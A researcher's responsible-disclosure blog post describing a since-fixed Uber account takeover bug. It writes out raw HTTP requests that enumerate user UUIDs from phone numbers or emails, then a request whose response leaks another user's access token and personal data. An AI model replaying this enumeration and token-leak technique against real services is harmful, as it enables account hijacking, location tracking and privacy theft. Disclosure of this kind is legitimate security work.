Vulnerability Management

How your Uber account could have been hacked!

This post is about an account takeover vulnerability on Uber which allowed attackers to take over any other user’s Uber account.

Anand Prakash

Written by Anand Prakash

September 11, 2019 | 3 min read

This is being published with the permission of Uber under the responsible disclosure policy. This issue was plugged in quickly by the security team at Uber.

This issue is similar to Facebook’s access token leak, which was discovered last year https://techcrunch.com/2018/09/28/facebook-says-50-million-accounts-affected-by-account-takeover-bug/

This post is about an account takeover vulnerability on Uber that allowed attackers to take over any other user’s Uber account.

About Uber

Uber is a transportation network company (TNC) headquartered in San Francisco, California. Uber offers services including peer-to-peer ridesharing, taxi cab hailing, food delivery, and a bicycle-sharing system. The company has operations in 785 metropolitan areas worldwide. Uber has a valuation of over $100 billion, as per Bloomberg’s report.

Vulnerability Description

This post is about an account takeover vulnerability on Uber that allowed attackers to take over any other user’s Uber account (including riders, partners, eats) account by supplying user UUID in the API request and using the leaked token in the API response to hijack accounts. I could enumerate any other Uber user UUID by supplying their phone number or email address in another API request.

It allowed an attacker to track the victim’s location, take rides from their account, etc. by compromising the account using the leaked access token of the Uber mobile application. This also permitted the takeover of Uber driver, Eats accounts.

Steps to Reproduce

Step1: Getting the user UUID of any Uber User

Below APIs leaked any Uber user’s (Partner, Rider, Ubereats user) UUID if supplied with their phone number or email address

API Call #1

POST /p3/fleet-manager/_rpc?rpc=addDriverV2 HTTP/1.1
Host: partners.uber.com
{“nationalPhoneNumber”:”99999xxxxx”,”countryCode”:”1"}

Response:
{“status”:”failure”,”data”:{“code”:1009,”message”:”Driver ‘47d063f8–0xx5e-xxxxx-b01a-xxxx’ not found”}}

‘47d063f8–0xx5e-4eb4-xxx-xxxxxxx’ is leaked Uber UUID of Uber user having phone number 99999xxxxx

API Call #2

POST /p3/fleet-manager/_rpc?rpc=addDriverV2 HTTP/1.1
Host: partners.uber.com
{“email”:”[email protected]”}

Response leaks UUID:

{“status”:”failure”,”data”:{“code”:1009,”message”:”Driver ‘ca111b95–1111–4396-b907–83abxxx5f7371e’ not found”}}

‘Ca111b95–1111–4396-b907–83abxxx5f7371e’ is leaked Uber UUID of Uber user having email address [email protected].

Step 2: Getting access token of any Uber user by supplying user id.

Once you have the leaked Uber UUID from the above request for any user. Then you can replay the below request using the victim’s Uber UUID to get access to their private information like access token (mobile apps), location, address, etc. Access token allowed me to take over the victim’s account completely, I was able to see rides, request rides, see payment information, etc. of our test accounts using the leaked token.

The vulnerable Uber API:

POST /marketplace/_rpc?rpc=getConsentScreenDetails HTTP/1.1
Host: bonjour.uber.com
Connection: close
Content-Length: 67
Accept: application/json
Origin: https://bonjour.uber.com
x-csrf-token: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: xxxxx
{“language”:”en”,”userUuid”:”xxxx–776–4xxxx1bd-861a-837xxx604ce”}

Response leaked entire data of the other user, including mobile apps access token:

{“status”:”success”,”data”:{“data”:{“language”:”en”,”userUuid”:”xxxxxx1e”},”getUser”:{“uuid”:”cxxxxxc5f7371e”,”firstname”:”Maxxxx”,”lastname”:”XXXX”,”role”:”PARTNER”,”languageId”:1,”countryId”:77,”mobile”:null,”mobileToken”:1234,”mobileCountryId”:77,”mobileCountryCode”:”+91",”hasAmbiguousMobileCountry”:false,”lastConfirmedMobileCountryId”:77,”email”:”[email protected]”,”emailToken”:”xxxxxxxx”,”hasConfirmedMobile”:”no”,”hasOptedInSmsMarketing”:false,”hasConfirmedEmail”:true,”gratuity”:0.3,”nickname”:”[email protected]”,”location”:”00000",”banned”:false,”cardio”:false,”token”:”b8038ec4143bb4xxxxxx72d”,”fraudScore”:0,”inviterUuid”:null,”pictureUrl”:”xxxxx.jpeg”,”recentFareSplitterUuids”:[“xxx”],”lastSelectedPaymentProfileUuid”:”xxxxxx”,”lastSelectedPaymentProfileGoogleWalletUuid”:null,”inviteCode”:{“promotionCodeId”:xxxxx,”promotionCodeUuid”:”xxxx”,”promotionCode”:”manishas105",”createdAt”:{“type”:”Buffer”,”data”:[0,0,1,76,2,21,215,101]},”updatedAt”:{“type”:”Buffer”,”data”:[0,0,1,76,65,211,61,9]}},”driverInfo”:{“contactinfo”:”999999999xx”,”contactinfoCountryCode”:”+91",”driverLicense”:”None”,”firstDriverTripUuid”:null,”iphone”:null,”partnerUserUuid”:”xxxxxxx”,”receiveSms”:true,”twilioNumber”:null,”twilioNumberFormatted”:null,”cityknowledgeScore”:0,”createdAt”:{“type”:”Buffer”,”data”:[0,0,1,84,21,124,80,52]},”updatedAt”:{“type”:”Buffer”,”data”:[0,0,1,86,152,77,41,77]},”deletedAt”:null,”driverStatus”:”APPLIED”,”driverFlowType”:”UBERX”,”statusLocks”:null,”contactinfoCountryIso2Code”:”KR”,”driverEngagement”:null,”courierEngagement”:null},”partnerInfo”:{“address”:”Nxxxxxxx”,”territoryUuid”:”xxxxxx”,”company”:”None”,”address2":”None”,”cityId”:130,”cityName”:”None”,”firstPartnerTripUuid”:null,”preferredCollectionPaymentProfileUuid”:null,”phone”:””,”phoneCountryCode”:”+91",”state”:”None”,”vatNumber”:”None”,”zipcode”:”None”,”createdAt”:{“type”:”Buffer”,”data”:[0,0,1,84,21,124,80,52]},”updatedAt”:{“type”:”Buffer”,”data”:[0,0,1,101,38,177,88,137]},”deletedAt”:null,”fleetTypes”:[],”fleetServices”:[],”isFleet”:true},”analytics”:{“signupLat”:133.28741199,”signupLng”:11177.1111,”signupTerritoryUuid”:”xxxxx”,”signupPromoId”:null,”signupForm”:”iphone”,”signupSessionId”:”xxxxxxx”,”signupAppVersion”:”2.64.1",”signupAttributionMethod”:null,”createdAt”:{“type”:”Buffer”,”data”:[0,0,1,76,2,21,219,1]},”updatedAt”:{“type”:”Buffer”,”data”:[0,0,1,76,2,21,219,1]},”signupCityId”:130,”signupDeviceId”:null,”signupReferralId”:null,”signupPromoCode”:null,”signupPromoCodeUuid”:null,”signupPromoUuid”:null,”signupMethod”:”REGULAR”},”createdAt”:{“type”:”Buffer”,”data”:[0,0,1,76,2,21,215,153]},”updatedAt”:{“type”:”Buffer”,”data”:[0,0,1,102,81,35,153,135]},”deletedAt”:null,”tenancy”:”uber/production”,”mobileConfirmationStatus”:”MOBILE_NOT_CONFIRMED”,”nationalId”:null,”nationalIdType”:null,”merchantLocation”:null,”lastConfirmedMobile”:”xxxxxxxxxx”,”requestedDeletionAt”:null,”dateOfBirth”:xxxxxx,”userTypes”:null,”preferredName”:”xxxxxxxx”,”freightInfo”:null,”tempPictureUrl”:null,”identityVerified”:null,”paymentEntityType”:null,”riderEngagement”:null,”identityRejectReasonUuid”:null,”genderInferred”:null,”genderIdentity”:null,”genderDocumented”:null,”riderIneligibleWdw”:null,”defaultPaymentProfileByProduct”:null,”loginEligibility”:null},”getDisclosureVersionUuid”:””,”getLocaleCopy”:null}}

Video Proof of Concept

Uber account takeover – access token leak

Uber fixed the issue by authorizing the request with the current user session and removing sensitive information like access tokens from the response.

Disclosure Timeline

April 19, 2019 — Reported to Uber
April 25, 2019 — Report Triaged
April 26, 2019 — Vulnerability fixed, the bounty of $6500 USD awarded.
June 28th, 2019 — Requested for disclosure
September 9, 2019 — Report disclosed by Uber